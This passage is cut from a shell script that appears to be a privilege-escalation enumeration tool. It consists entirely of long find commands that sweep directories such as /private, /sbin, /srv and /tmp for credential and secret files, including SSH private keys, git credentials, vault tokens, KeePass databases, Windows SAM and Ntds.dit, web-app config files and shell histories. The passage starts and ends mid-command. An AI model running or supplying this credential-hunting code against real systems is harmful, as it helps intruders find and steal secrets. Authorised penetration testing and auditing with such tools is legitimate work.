-o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_PRIVATE=`eval_bckgrd "find /private -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"agent*\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_RUN=`eval_bckgrd "find /run -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SBIN=`eval_bckgrd "find /sbin -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SNAP=`eval_bckgrd "find /snap -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SRV=`eval_bckgrd "find /srv -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYS=`eval_bckgrd "find /sys -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_TMP=`eval_bckgrd "find /tmp -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"sess_*\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"agent*\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_USR=`eval_bckgrd "find /usr -name \"docker.sock\" -o -name \"*vnc*.txt\" -o 